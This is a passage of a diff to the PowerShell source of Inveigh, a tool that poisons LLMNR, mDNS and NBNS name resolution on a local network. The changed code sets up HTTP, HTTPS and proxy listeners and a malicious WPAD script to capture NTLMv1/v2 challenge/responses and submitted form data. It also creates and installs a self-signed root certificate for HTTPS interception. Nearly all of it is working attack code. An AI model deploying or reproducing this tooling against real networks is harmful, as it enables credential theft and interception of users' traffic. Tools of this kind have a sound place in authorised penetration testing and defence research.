!$inveigh.relay_running) +if($HTTP_listener.IsListening -and !$inveigh.relay_running) { - $inveigh.HTTP_listener.Stop() - $inveigh.HTTP_listener.Close() + $HTTP_listener.Stop() + $HTTP_listener.Close() } -if(!$inveigh.relay_running -or !$inveigh.unprivileged_running) +if(!$inveigh.relay_running) { + $inveigh.cleartext_file_queue = New-Object System.Collections.ArrayList $inveigh.console_queue = New-Object System.Collections.ArrayList - $inveigh.status_queue = New-Object System.Collections.ArrayList + $inveigh.HTTP_challenge_queue = New-Object System.Collections.ArrayList $inveigh.log_file_queue = New-Object System.Collections.ArrayList $inveigh.NTLMv1_file_queue = New-Object System.Collections.ArrayList $inveigh.NTLMv2_file_queue = New-Object System.Collections.ArrayList - $inveigh.cleartext_file_queue = New-Object System.Collections.ArrayList - $inveigh.HTTP_challenge_queue = New-Object System.Collections.ArrayList - $inveigh.certificate_application_ID = $HTTPSCertAppID - $inveigh.certificate_thumbprint = $HTTPSCertThumbprint - $inveigh.console_output = $false + $inveigh.POST_request_file_queue = New-Object System.Collections.ArrayList + $inveigh.status_queue = New-Object System.Collections.ArrayList $inveigh.console_input = $true + $inveigh.console_output = $false $inveigh.file_output = $false + $inveigh.HTTPS_existing_certificate = $false + $inveigh.HTTPS_force_certificate_delete = $false + $inveigh.log_output = $true + $inveigh.cleartext_out_file = $output_directory + "\Inveigh-Cleartext.txt" $inveigh.log_out_file = $output_directory + "\Inveigh-Log.txt" $inveigh.NTLMv1_out_file = $output_directory + "\Inveigh-NTLMv1.txt" $inveigh.NTLMv2_out_file = $output_directory + "\Inveigh-NTLMv2.txt" - $inveigh.cleartext_out_file = $output_directory + "\Inveigh-Cleartext.txt" + $inveigh.POST_request_out_file = $output_directory + "\Inveigh-FormInput.txt" +} + +if($ElevatedPrivilege -eq 'Auto') +{ + $elevated_privilege = [Bool](([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups -match "S-1-5-32-544") +} +else +{ + + if($ElevatedPrivilege -eq 'Y') + { + $elevated_privilege = $true + } + else + { + $elevated_privilege = $false + } + +} + +if($StartupChecks -eq 'Y') +{ + + $firewall_status = netsh advfirewall show allprofiles state | Where-Object {$_ -match 'ON'} + + if($HTTP -eq 'Y') + { + $HTTP_port_check = netstat -anp TCP | findstr LISTENING | findstr /C:"$HTTPIP`:$HTTPPort " + } + + if($HTTPS -eq 'Y') + { + $HTTPS_port_check = netstat -anp TCP | findstr LISTENING | findstr /C:"$HTTPIP`:$HTTPSPort " + } + + if($Proxy -eq 'Y') + { + $HTTPS_port_check = netstat -anp TCP | findstr LISTENING | findstr /C:"$HTTPIP`:$ProxyPort " + } + + if($LLMNR -eq 'Y' -and !$elevated_privilege) + { + $LLMNR_port_check = netstat -anp UDP | findstr /C:"0.0.0.0:5355 " + } + + if($mDNS -eq 'Y' -and !$elevated_privilege) + { + $mDNS_port_check = netstat -anp UDP | findstr /C:"0.0.0.0:5353 " + } + } +if(!$elevated_privilege) +{ + + if($HTTPS -eq 'Y') + { + Write-Output "Error:-HTTPS requires elevated privileges" + throw + } + + if($SpooferLearning -eq 'Y') + { + Write-Output "Error:-SpooferLearning requires elevated privileges" + throw + } + + $NBNS = "Y" + $SMB = "N" + +} + +$inveigh.hostname_spoof = $false $inveigh.running = $true if($StatusOutput -eq 'Y') @@ -414,11 +584,22 @@ else if($Inspect) { - $LLMNR = "N" - $NBNS = "N" - $HTTP = "N" - $HTTPS = "N" - $SMB = "N" + + if($elevated_privilege) + { + $LLMNR = "N" + $NBNS = "N" + $HTTP = "N" + $HTTPS = "N" + $Proxy = "N" + } + else + { + $HTTP = "N" + $HTTPS = "N" + $Proxy = "N" + } + } if($Tool -eq 1) # Metasploit Interactive PowerShell Payloads and Meterpreter's PowerShell Extension @@ -427,6 +608,7 @@ if($Tool -eq 1) # Metasploit Interactive PowerShell Payloads and Meterpreter's P $inveigh.output_stream_only = $true $inveigh.newline = "" $ConsoleOutput = "N" + } elseif($Tool -eq 2) # PowerShell Empire { @@ -434,8 +616,29 @@ elseif($Tool -eq 2) # PowerShell Empire $inveigh.output_stream_only = $true $inveigh.console_input = $false $inveigh.newline = "`n" - $ConsoleOutput = "Y" + $LogOutput = "N" $ShowHelp = "N" + + switch ($ConsoleOutput) + { + + 'Low' + { + $ConsoleOutput = "Low" + } + + 'Medium' + { + $ConsoleOutput = "Medium" + } + + default + { + $ConsoleOutput = "Y" + } + + } + } else { @@ -444,12 +647,30 @@ else } # Write startup messages -$inveigh.status_queue.Add("Inveigh started at $(Get-Date -format 's')") > $null -$inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Inveigh started")]) > $null +$inveigh.status_queue.Add("Inveigh $inveigh_version started at $(Get-Date -format 's')") > $null -if($StartupChecks -eq 'Y') +if($FileOutput -eq 'Y') { - $firewall_status = netsh advfirewall show allprofiles state | Where-Object {$_ -match 'ON'} + $inveigh.log_file_queue.Add("$(Get-Date -format 's') - Inveigh $inveigh_version started") > $null +} + +if($LogOutput -eq 'Y') +{ + $inveigh.log.Add("$(Get-Date -format 's') - Inveigh started") > $null + $inveigh.log_output = $true +} +else +{ + $inveigh.log_output = $false +} + +if($ElevatedPrivilege -eq 'Y' -or $elevated_privilege) +{ + $inveigh.status_queue.Add("Elevated Privilege Mode = Enabled") > $null +} +else +{ + $inveigh.status_queue.Add("Elevated Privilege Mode = Disabled") > $null } if($firewall_status) @@ -465,14 +686,28 @@ if($firewall_status) } -$inveigh.status_queue.Add("Listening IP Address = $IP") > $null -$inveigh.status_queue.Add("LLMNR/NBNS Spoofer IP Address = $SpooferIP") > $null +$inveigh.status_queue.Add("Primary IP Address = $IP") > $null + +if($LLMNR -eq 'Y' -or $mDNS -eq 'Y' -or $NBNS -eq 'Y') +{ + $inveigh.status_queue.Add("LLMNR/mDNS/NBNS Spoofer IP Address = $SpooferIP") > $null +} if($LLMNR -eq 'Y') { - $inveigh.status_queue.Add("LLMNR Spoofer = Enabled") > $null - $inveigh.status_queue.Add("LLMNR TTL = $LLMNRTTL Seconds") > $null - $LLMNR_response_message = "- response sent" + + if($elevated_privilege -or !$LLMNR_port_check) + { + $inveigh.status_queue.Add("LLMNR Spoofer = Enabled") > $null + $inveigh.status_queue.Add("LLMNR TTL = $LLMNRTTL Seconds") > $null + $LLMNR_response_message = "- response sent" + } + else + { + $LLMNR = "N" + $inveigh.status_queue.Add("LLMNR Spoofer Disabled Due To In Use Port 5355") > $null + } + } else { @@ -480,9 +715,43 @@ else $LLMNR_response_message = "- LLMNR spoofer is disabled" } +if($mDNS -eq 'Y') +{ + + if($elevated_privilege -or !$mDNS_port_check) + { + $inveigh.status_queue.Add("mDNS Spoofer = Enabled") > $null + $inveigh.status_queue.Add("mDNS TTL = $mDNSTTL Seconds") > $null + $mDNSTypes_output = $mDNSTypes -join "," + $mDNS_response_message = "- response sent" + + if($mDNSTypes.Count -eq 1) + { + $inveigh.status_queue.Add("mDNS Spoofer For Type $mDNSTypes_output = Enabled") > $null + } + else + { + $inveigh.status_queue.Add("mDNS Spoofer For Types $mDNSTypes_output = Enabled") > $null + } + + } + else + { + $mDNS = "N" + $inveigh.status_queue.Add("mDNS Spoofer Disabled Due To In Use Port 5353") > $null + } + +} +else +{ + $inveigh.status_queue.Add("mDNS Spoofer = Disabled") > $null + $mDNS_response_message = "- mDNS spoofer is disabled" +} + if($NBNS -eq 'Y') { $NBNSTypes_output = $NBNSTypes -join "," + $NBNS_response_message = "- response sent" if($NBNSTypes.Count -eq 1) { @@ -493,8 +762,6 @@ if($NBNS -eq 'Y') $inveigh.status_queue.Add("NBNS Spoofer For Types $NBNSTypes_output = Enabled") > $null } - $inveigh.status_queue.Add("NBNS TTL = $NBNSTTL Seconds") > $null - $NBNS_response_message = "- response sent" } else { @@ -502,6 +769,24 @@ else $NBNS_response_message = "- NBNS spoofer is disabled" } +if($NBNSBruteForce -eq 'Y') +{ + $inveigh.status_queue.Add("NBNS Brute Force Spoofer Target = $NBNSBruteForceTarget") > $null + $inveigh.status_queue.Add("NBNS Brute Force Spoofer IP Address = $SpooferIP") > $null + $inveigh.status_queue.Add("NBNS Brute Force Spoofer Hostname = $NBNSBruteForceHost") > $null + + if($NBNSBruteForcePause) + { + $inveigh.status_queue.Add("NBNS Brute Force Pause = $NBNSBruteForcePause Seconds") > $null + } + +} + +if($NBNS -eq 'Y' -or $NBNSBruteForce -eq 'Y') +{ + $inveigh.status_queue.Add("NBNS TTL = $NBNSTTL Seconds") > $null +} + if($SpooferLearning -eq 'Y' -and ($LLMNR -eq 'Y' -or $NBNS -eq 'Y')) { $inveigh.status_queue.Add("Spoofer Learning = Enabled") > $null @@ -560,7 +845,7 @@ else $inveigh.spoofer_repeat = $true } -if($SMB -eq 'Y') +if($SMB -eq 'Y' -and $elevated_privilege) { $inveigh.status_queue.Add("SMB Capture = Enabled") > $null } @@ -571,67 +856,125 @@ else if($HTTP -eq 'Y') { - - if($StartupChecks -eq 'Y') - { - $HTTP_port_check = netstat -anp TCP | findstr LISTENING | findstr /C:":80 " - } if($HTTP_port_check) { - $inveigh.HTTP = $false - $inveigh.status_queue.Add("HTTP Capture Disabled Due To In Use Port 80") > $null + $HTTP = "N" + $inveigh.status_queue.Add("HTTP Capture Disabled Due To In Use Port $HTTPPort") > $null } else { - $inveigh.HTTP = $true + + if($HTTPIP -ne '0.0.0.0') + { + $inveigh.status_queue.Add("HTTP IP = $HTTPIP") > $null + } + + if($HTTPPort -ne 80) + { + $inveigh.status_queue.Add("HTTP Port = $HTTPPort") > $null + } + $inveigh.status_queue.Add("HTTP Capture = Enabled") > $null } } else { - $inveigh.HTTP = $false $inveigh.status_queue.Add("HTTP Capture = Disabled") > $null } if($HTTPS -eq 'Y') { - - if($StartupChecks -eq 'Y') - { - $HTTPS_port_check = netstat -anp TCP | findstr LISTENING | findstr /C:":443 " - } if($HTTPS_port_check) { + $HTTPS = "N" $inveigh.HTTPS = $false - $inveigh.status_queue.Add("HTTPS Capture Disabled Due To In Use Port 443") > $null + $inveigh.status_queue.Add("HTTPS Capture Disabled Due To In Use Port $HTTPSPort") > $null } else { try - { + { + $inveigh.certificate_issuer = $HTTPSCertIssuer + $inveigh.certificate_CN = $HTTPSCertSubject + $inveigh.status_queue.Add("HTTPS Certificate Issuer = " + $inveigh.certificate_issuer) > $null + $inveigh.status_queue.Add("HTTPS Certificate CN = " + $inveigh.certificate_CN) > $null + $certificate_check = (Get-ChildItem Cert:\LocalMachine\My | Where-Object {$_.Issuer -Like "CN=" + $inveigh.certificate_issuer}) + + if(!$certificate_check) + { + # credit to subTee for cert creation code https://github.com/subTee/Interceptor + $certificate_distinguished_name = new-object -com "X509Enrollment.CX500DistinguishedName" + $certificate_distinguished_name.Encode( "CN=" + $inveigh.certificate_CN, $certificate_distinguished_name.X500NameFlags.X500NameFlags.XCN_CERT_NAME_STR_NONE) + $certificate_issuer_distinguished_name = new-object -com "X509Enrollment.CX500DistinguishedName" + $certificate_issuer_distinguished_name.Encode("CN=" + $inveigh.certificate_issuer, $certificate_distinguished_name.X500NameFlags.X500NameFlags.XCN_CERT_NAME_STR_NONE) + $certificate_key = new-object -com "X509Enrollment.CX509PrivateKey" + $certificate_key.ProviderName = "Microsoft Enhanced RSA and AES Cryptographic Provider" + $certificate_key.KeySpec = 2 + $certificate_key.Length = 2048 + $certificate_key.MachineContext = 1 + $certificate_key.Create() + $certificate_server_auth_OID = new-object -com "X509Enrollment.CObjectId" + $certificate_server_auth_OID.InitializeFromValue("1.3.6.1.5.5.7.3.1") + $certificate_enhanced_key_usage_OID = new-object -com "X509Enrollment.CObjectIds.1" + $certificate_enhanced_key_usage_OID.add($certificate_server_auth_OID) + $certificate_enhanced_key_usage_extension = new-object -com "X509Enrollment.CX509ExtensionEnhancedKeyUsage" + $certificate_enhanced_key_usage_extension.InitializeEncode($certificate_enhanced_key_usage_OID) + $certificate = new-object -com "X509Enrollment.CX509CertificateRequestCertificate" + $certificate.InitializeFromPrivateKey(2,$certificate_key,"") + $certificate.Subject = $certificate_distinguished_name + $certificate.Issuer = $certificate_issuer_distinguished_name + $certificate.NotBefore = (get-date).AddDays(-271) + $certificate.NotAfter = $certificate.NotBefore.AddDays(824) + $certificate_hash_algorithm_OID = New-Object -ComObject X509Enrollment.CObjectId + $certificate_hash_algorithm_OID.InitializeFromAlgorithmName(1,0,0,"SHA256") + $certificate.HashAlgorithm = $certificate_hash_algorithm_OID + $certificate.X509Extensions.Add($certificate_enhanced_key_usage_extension) + $certificate_basic_constraints = new-object -com "X509Enrollment.CX509ExtensionBasicConstraints" + $certificate_basic_constraints.InitializeEncode("true",1) + $certificate.X509Extensions.Add($certificate_basic_constraints) + $certificate.Encode() + $certificate_enrollment = new-object -com "X509Enrollment.CX509Enrollment" + $certificate_enrollment.InitializeFromRequest($certificate) + $certificate_data = $certificate_enrollment.CreateRequest(0) + $certificate_enrollment.InstallResponse(2,$certificate_data,0,"") + $inveigh.certificate = (Get-ChildItem Cert:\LocalMachine\My | Where-Object {$_.Issuer -match $inveigh.certificate_issuer}) + } + else + { + + if($HTTPSForceCertDelete -eq 'Y') + { + $inveigh.HTTPS_force_certificate_delete = $true + } + + $inveigh.HTTPS_existing_certificate = $true + $inveigh.status_queue.Add("HTTPS Capture = Using Existing Certificate") > $null + } + $inveigh.HTTPS = $true - $certificate_store = New-Object System.Security.Cryptography.X509Certificates.X509Store("My","LocalMachine") - $certificate_store.Open('ReadWrite') - $certificate = New-Object System.Security.Cryptography.X509Certificates.X509Certificate2 - $certificate.Import($PWD.Path + "\Inveigh.pfx") - $certificate_store.Add($certificate) - $certificate_store.Close() - $netsh_certhash = "certhash=" + $inveigh.certificate_thumbprint - $netsh_app_ID = "appid={" + $inveigh.certificate_application_ID + "}" - $netsh_arguments = @("http","add","sslcert","ipport=0.0.0.0:443",$netsh_certhash,$netsh_app_ID) - & "netsh" $netsh_arguments > $null + + if($HTTPIP -ne '0.0.0.0') + { + $inveigh.status_queue.Add("HTTPS IP = $HTTPIP") > $null + } + + if($HTTPSPort -ne 443) + { + $inveigh.status_queue.Add("HTTPS Port = $HTTPSPort") > $null + } + $inveigh.status_queue.Add("HTTPS Capture = Enabled") > $null + } catch { - $certificate_store.Close() - $HTTPS="N" + $HTTPS = "N" $inveigh.HTTPS = $false - $inveigh.status_queue.Add("HTTPS Capture Disabled Due To Certificate Install Error") > $null + $inveigh.status_queue.Add("HTTPS Capture Disabled Due To Certificate Error") > $null } } @@ -642,11 +985,22 @@ else $inveigh.status_queue.Add("HTTPS Capture = Disabled") > $null } -if($inveigh.HTTP -or $inveigh.HTTPS) +if($HTTP -eq 'Y' -or $HTTPS -eq 'Y') { $inveigh.status_queue.Add("HTTP/HTTPS Authentication = $HTTPAuth") > $null $inveigh.status_queue.Add("WPAD Authentication = $WPADAuth") > $null + if($WPADAuth -like "NTLM*") + { + $WPADAuthIgnore = ($WPADAuthIgnore | Where-Object {$_ -and $_.Trim()}) + + if($WPADAuthIgnore.Count -gt 0) + { + $inveigh.status_queue.Add("WPAD NTLM Auth Ignored User Agents = " + ($WPADAuthIgnore -join ",")) > $null + } + + } + if($HTTPDir -and !$HTTPResponse) { $inveigh.status_queue.Add("HTTP/HTTPS Directory = $HTTPDir") > $null @@ -665,7 +1019,12 @@ if($inveigh.HTTP -or $inveigh.HTTPS) if($HTTPResponse) { - $inveigh.status_queue.Add("HTTP/HTTPS Custom Response = Enabled") > $null + $inveigh.status_queue.Add("HTTP/HTTPS Response = Enabled") > $null + } + + if($HTTPResponse -or $HTTPDir -and $HTTPContentType -ne 'html/text') + { + $inveigh.status_queue.Add("HTTP/HTTPS/Proxy Content Type = $HTTPContentType") > $null } if($HTTPAuth -eq 'Basic' -or $WPADAuth -eq 'Basic') @@ -673,11 +1032,67 @@ if($inveigh.HTTP -or $inveigh.HTTPS) $inveigh.status_queue.Add("Basic Authentication Realm = $HTTPBasicRealm") > $null } - if($WPADIP -and $WPADPort) + if($Proxy -eq 'Y') + { + $inveigh.status_queue.Add("Proxy Capture = Enabled") > $null + $inveigh.status_queue.Add("Proxy Authentication = $ProxyAuth") > $null + $ProxyPortFailover = $ProxyPort + 1 + $ProxyIgnore = ($ProxyIgnore | Where-Object {$_ -and $_.Trim()}) + + if($ProxyIgnore.Count -gt 0) + { + $inveigh.status_queue.Add("Proxy Ignored User Agents = " + ($ProxyIgnore -join ",")) > $null + } + + if($ProxyIP -eq '0.0.0.0') + { + $proxy_WPAD_IP = $IP + } + else + { + $proxy_WPAD_IP = $ProxyIP + } + + if($WPADIP -and $WPADPort) + { + $WPADResponse = "function FindProxyForURL(url,host){$WPAD_direct_hosts_function return `"PROXY $proxy_WPAD_IP`:$ProxyPort; PROXY $WPADIP`:$WPADPort; DIRECT`";}" + } + else + { + $WPADResponse = "function FindProxyForURL(url,host){$WPAD_direct_hosts_function return `"PROXY $proxy_WPAD_IP`:$ProxyPort; PROXY $proxy_wpad_IP`:$ProxyPortFailover; DIRECT`";}" + } + + } + + if($WPADDirectHosts) + { + ForEach($WPAD_direct_host in $WPADDirectHosts) + { + $WPAD_direct_hosts_function += 'if (dnsDomainIs(host, "' + $WPAD_direct_host + '")) return "DIRECT";' + } + + $inveigh.status_queue.Add("WPAD Direct Hosts = " + ($WPADDirectHosts -join ",")) > $null + } + + if($WPADResponse -and $Proxy -eq 'N') + { + $inveigh.status_queue.Add("WPAD Custom Response = Enabled") > $null + } + elseif($WPADResponse -and $Proxy -eq 'Y') + { + $inveigh.status_queue.Add("WPAD Proxy Response = Enabled") > $null + + if($WPADIP -and $WPADPort) + { + $inveigh.status_queue.Add("WPAD Failover = $WPADIP`:$WPADPort") > $null + } + + } + elseif($WPADIP -and $WPADPort) { $inveigh.status_queue.Add("WPAD Response = Enabled") > $null $inveigh.status_queue.Add("WPAD = $WPADIP`:$WPADPort") > $null - + if($WPADDirectHosts) { ForEach($WPAD_direct_host in $WPADDirectHosts) @@ -690,16 +1105,11 @@ if($inveigh.HTTP -or $inveigh.HTTPS) } else { - $WPADResponse = "function FindProxyForURL(url,host){return `"PROXY " + $WPADIP + ":" + $WPADPort + "`";}" + $WPADResponse = "function FindProxyForURL(url,host){$WPAD_direct_hosts_function return `"PROXY $WPADIP`:$WPADPort; DIRECT`";}" } } - elseif($WPADResponse -and !$WPADIP -and !$WPADPort) - { - $inveigh.status_queue.Add("WPAD Custom Response = Enabled") > $null - $WPADResponse = $WPADResponse - } - elseif($WPADEmptyFile -eq 'Y') + elseif($WPADDirectFile -eq 'Y') { $inveigh.status_queue.Add("WPAD Default Response = Enabled") > $null $WPADResponse = "function FindProxyForURL(url,host){return `"DIRECT`";}" @@ -722,9 +1132,18 @@ else $inveigh.machine_accounts = $true } -if($ConsoleOutput -eq 'Y') +if($ConsoleOutput -ne 'N') { - $inveigh.status_queue.Add("Real Time Console Output = Enabled") > $null + + if($ConsoleOutput -eq 'Y') + { + $inveigh.status_queue.Add("Real Time Console Output = Enabled") > $null + } + else + { + $inveigh.status_queue.Add("Real Time Console Output = $ConsoleOutput") > $null + } + $inveigh.console_output = $true if($ConsoleStatus -eq 1) @@ -780,6 +1199,11 @@ else $inveigh.file_unique = $false } +if($RunCount) +{ + $inveigh.status_queue.Add("Run Count = $RunCount") > $null +} + if($RunTime -eq 1) { $inveigh.status_queue.Add("Run Time = $RunTime Minute") > $null @@ -806,41 +1230,19 @@ if($inveigh.status_output) while($inveigh.status_queue.Count -gt 0) { - if($inveigh.output_stream_only) - { - Write-Output($inveigh.status_queue[0] + $inveigh.newline) - $inveigh.status_queue.RemoveAt(0) - } - else + switch -Wildcard ($inveigh.status_queue[0]) { - switch -Wildcard ($inveigh.status_queue[0]) + {$_ -like "* Disabled Due To *" -or $_ -like "Run Stop-Inveigh to stop Inveigh" -or $_ -like "Windows Firewall = Enabled"} { + Write-Warning ($inveigh.status_queue[0] + $inveigh.newline) + $inveigh.status_queue.RemoveAt(0) + } - "* Disabled Due To *" - { - Write-Warning($inveigh.status_queue[0]) - $inveigh.status_queue.RemoveAt(0) - } - - "Run Stop-Inveigh to stop Inveigh" - { - Write-Warning($inveigh.status_queue[0]) - $inveigh.status_queue.RemoveAt(0) - } - - "Windows Firewall = Enabled" - { - Write-Warning($inveigh.status_queue[0]) - $inveigh.status_queue.RemoveAt(0) - } - - default - { - Write-Output($inveigh.status_queue[0]) - $inveigh.status_queue.RemoveAt(0) - } - + default + { + Write-Output ($inveigh.status_queue[0] + $inveigh.newline) + $inveigh.status_queue.RemoveAt(0) } } @@ -894,6 +1296,18 @@ $shared_basic_functions_scriptblock = return $string_extract } + function ConvertFrom-PacketOrderedDictionary + { + param($packet_ordered_dictionary) + + ForEach($field in $packet_ordered_dictionary.Values) + { + $byte_array += $field + } + + return $byte_array + } + } # SMB NTLM Functions ScriptBlock - function for parsing NTLM challenge/response @@ -955,7 +1369,17 @@ $SMB_NTLM_functions_scriptblock = if($source_IP -ne $IP -and ($inveigh.machine_accounts -or (!$inveigh.machine_accounts -and -not $NTLM_user_string.EndsWith('$')))) { - $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - SMB NTLMv2 challenge/response for $NTLM_domain_string\$NTLM_user_string captured from $source_IP($NTLM_host_string)")]) + + if($inveigh.file_output) + { + $inveigh.log_file_queue.Add("$(Get-Date -format 's') - SMB NTLMv2 challenge/response for $NTLM_domain_string\$NTLM_user_string captured from $source_IP($NTLM_host_string)") + } + + if($inveigh.log_output) + { + $inveigh.log.Add("$(Get-Date -format 's') - SMB NTLMv2 challenge/response for $NTLM_domain_string\$NTLM_user_string captured from $source_IP($NTLM_host_string)") + } + $inveigh.NTLMv2_list.Add($NTLMv2_hash) if(!$inveigh.console_unique -or ($inveigh.console_unique -and $inveigh.NTLMv2_username_list -notcontains "$source_IP $NTLM_domain_string\$NTLM_user_string")) @@ -964,7 +1388,7 @@ $SMB_NTLM_functions_scriptblock = } else { - $inveigh.console_queue.Add("$(Get-Date -format 's') - SMB NTLMv2 challenge/response captured from $source_IP($NTLM_host_string) for $NTLM_domain_string\$NTLM_user_string - not unique") + $inveigh.console_queue.Add("$(Get-Date -format 's') - SMB NTLMv2 challenge/response captured from $source_IP($NTLM_host_string):`n$NTLM_domain_string\$NTLM_user_string - not unique") } if($inveigh.file_output -and (!$inveigh.file_unique -or ($inveigh.file_unique -and $inveigh.NTLMv2_username_list -notcontains "$source_IP $NTLM_domain_string\$NTLM_user_string"))) @@ -992,7 +1416,17 @@ $SMB_NTLM_functions_scriptblock = if($source_IP -ne $IP -and ($inveigh.machine_accounts -or (!$inveigh.machine_accounts -and -not $NTLM_user_string.EndsWith('$')))) { - $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - SMB NTLMv1 challenge/response for $NTLM_domain_string\$NTLM_user_string captured from $source_IP($NTLM_host_string)")]) + + if($inveigh.file_output) + { + $inveigh.log_file_queue.Add("$(Get-Date -format 's') - SMB NTLMv1 challenge/response for $NTLM_domain_string\$NTLM_user_string captured from $source_IP($NTLM_host_string)") + } + + if($inveigh.log_output) + { + $inveigh.log.Add("$(Get-Date -format 's') - SMB NTLMv1 challenge/response for $NTLM_domain_string\$NTLM_user_string captured from $source_IP($NTLM_host_string)") + } + $inveigh.NTLMv1_list.Add($NTLMv1_hash) if(!$inveigh.console_unique -or ($inveigh.console_unique -and $inveigh.NTLMv1_username_list -notcontains "$source_IP $NTLM_domain_string\$NTLM_user_string")) @@ -1001,7 +1435,7 @@ $SMB_NTLM_functions_scriptblock = } else { - $inveigh.console_queue.Add("$(Get-Date -format 's') - SMB NTLMv1 challenge/response captured from $source_IP($NTLM_host_string) for $NTLM_domain_string\$NTLM_user_string - not unique") + $inveigh.console_queue.Add("$(Get-Date -format 's') - SMB NTLMv1 challenge/response captured from $source_IP($NTLM_host_string):`n$NTLM_domain_string\$NTLM_user_string - not unique") } if($inveigh.file_output -and (!$inveigh.file_unique -or ($inveigh.file_unique -and $inveigh.NTLMv1_username_list -notcontains "$source_IP $NTLM_domain_string\$NTLM_user_string"))) @@ -1030,14 +1464,14 @@ $SMB_NTLM_functions_scriptblock = } -# HTTP/HTTPS Server ScriptBlock - HTTP/HTTPS listener +# HTTP Server ScriptBlock - HTTP/HTTPS/Proxy listener $HTTP_scriptblock = { - param ($Challenge,$HTTPAuth,$HTTPBasicRealm,$HTTPDefaultEXE,$HTTPDefaultFile,$HTTPDir,$HTTPResponse,$WPADAuth,$WPADResponse) + param ($Challenge,$HTTPAuth,$HTTPBasicRealm,$HTTPContentType,$HTTPIP,$HTTPPort,$HTTPDefaultEXE,$HTTPDefaultFile,$HTTPDir,$HTTPResponse,$HTTPS_listener,$NBNSBruteForcePause,$ProxyIgnore,$proxy_listener,$WPADAuth,$WPADAuthIgnore,$WPADResponse) function NTLMChallengeBase64 { - param ([String]$Challenge) + param ([String]$Challenge,[Bool]$NTLMESS,[String]$ClientIPAddress,[Int]$ClientPort) $HTTP_timestamp = Get-Date $HTTP_timestamp = $HTTP_timestamp.ToFileTime() @@ -1053,14 +1487,24 @@ $HTTP_scriptblock = else { $HTTP_challenge_bytes = [String](1..8 | ForEach-Object {"{0:X2}" -f (Get-Random -Minimum 1 -Maximum 255)}) - $HTTP_challenge = $HTTP_challenge_bytes -replace ' ','' + $HTTP_challenge = $HTTP_challenge_bytes -replace ' ', '' $HTTP_challenge_bytes = $HTTP_challenge_bytes.Split(" ") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)} } - $inveigh.HTTP_challenge_queue.Add($inveigh.request.RemoteEndpoint.Address.IPAddressToString + $inveigh.request.RemoteEndpoint.Port + ',' + $HTTP_challenge) > $null + $inveigh.HTTP_challenge_queue.Add($ClientIPAddress + $ClientPort + ',' + $HTTP_challenge) > $null + + if($NTLMESS) + { + $HTTP_NTLM_negotiation_flags = 0x05,0x82,0x89,0x0a + } + else + { + $HTTP_NTLM_negotiation_flags = 0x05,0x82,0x81,0x0a + } $HTTP_NTLM_bytes = 0x4e,0x54,0x4c,0x4d,0x53,0x53,0x50,0x00,0x02,0x00,0x00,0x00,0x06,0x00,0x06,0x00,0x38, - 0x00,0x00,0x00,0x05,0x82,0x89,0xa + + 0x00,0x00,0x00 + + $HTTP_NTLM_negotiation_flags + $HTTP_challenge_bytes + 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x82,0x00,0x82,0x00,0x3e,0x00,0x00,0x00,0x06, 0x01,0xb1,0x1d,0x00,0x00,0x00,0x0f,0x4c,0x00,0x41,0x00,0x42,0x00,0x02,0x00,0x06,0x00, @@ -1075,298 +1519,603 @@ $HTTP_scriptblock = 0x00,0x00,0x00,0x00,0x0a,0x0a $NTLM_challenge_base64 = [System.Convert]::ToBase64String($HTTP_NTLM_bytes) - $NTLM = 'NTLM ' + $NTLM_challenge_base64 + $NTLM = "NTLM " + $NTLM_challenge_base64 $NTLM_challenge = $HTTP_challenge return $NTLM } - $HTTP_raw_url_output = $true + if($HTTPS_listener) + { + $HTTP_type = "HTTPS" + } + elseif($proxy_listener) + { + $HTTP_type = "Proxy" + } + else + { + $HTTP_type = "HTTP" + } + + if($HTTPIP -ne '0.0.0.0') + { + $HTTPIP = [System.Net.IPAddress]::Parse($HTTPIP) + $HTTP_endpoint = New-Object System.Net.IPEndPoint($HTTPIP,$HTTPPort) + } + else + { + $HTTP_endpoint = New-Object System.Net.IPEndPoint([System.Net.IPAddress]::any,$HTTPPort) + } + + $HTTP_running = $true + $HTTP_listener = New-Object System.Net.Sockets.TcpListener $HTTP_endpoint + $HTTP_client_close = $true + + if($proxy_listener) + { + $HTTP_linger = New-Object System.Net.Sockets.LingerOption($true,0) + $HTTP_listener.Server.LingerState = $HTTP_linger + } - while($inveigh.running) + try { - $inveigh.context = $inveigh.HTTP_listener.GetContext() - $inveigh.request = $inveigh.context.Request - $inveigh.response = $inveigh.context.Response - $NTLM = 'NTLM' - $NTLM_auth = $false - $basic_auth = $false - - if($inveigh.request.IsSecureConnection) + $HTTP_listener.Start() + } + catch + { + $inveigh.console_queue.Add("$(Get-Date -format 's') - Error starting $HTTP_type listener") + $HTTP_running = $false + + if($inveigh.file_output) { - $HTTP_type = "HTTPS" + $inveigh.log_file_queue.Add("$(Get-Date -format 's') - Error starting $HTTP_type listener") } - else + + if($inveigh.log_output) { - $HTTP_type = "HTTP" + $inveigh.log.Add("$(Get-Date -format 's') - Error starting $HTTP_type listener") } - - if($inveigh.request.RawUrl -match '/wpad.dat' -and $WPADAuth -eq 'Anonymous') + + } + + :HTTP_listener_loop while($inveigh.running -and $HTTP_running) + { + $TCP_request = "" + $TCP_request_bytes = New-Object System.Byte[] 4096 + $HTTP_send = $true + $HTTP_header_content_type = 0x43,0x6f,0x6e,0x74,0x65,0x6e,0x74,0x2d,0x54,0x79,0x70,0x65,0x3a,0x20 + [System.Text.Encoding]::UTF8.GetBytes("text/html") + $HTTP_header_cache_control = "" + $HTTP_header_authenticate = "" + $HTTP_header_authenticate_data = "" + $HTTP_message = "" + $HTTP_header_authorization = "" + $HTTP_header_host = "" + $HTTP_header_user_agent = "" + $HTTP_request_raw_URL = "" + $NTLM = "NTLM" + + while(!$HTTP_listener.Pending() -and !$HTTP_client.Connected) { - $inveigh.response.StatusCode = 200 + + Start-Sleep -m 10 + + if(!$inveigh.running) + { + break HTTP_listener_loop + } + } - else + + if($HTTPS_listener) { - $inveigh.response.StatusCode = 401 - } + + if(!$HTTP_client.Connected -or $HTTP_client_close -and $inveigh.running) + { + $HTTP_client = $HTTP_listener.AcceptTcpClient() + $HTTP_clear_stream = $HTTP_client.GetStream() + $HTTP_stream = New-Object 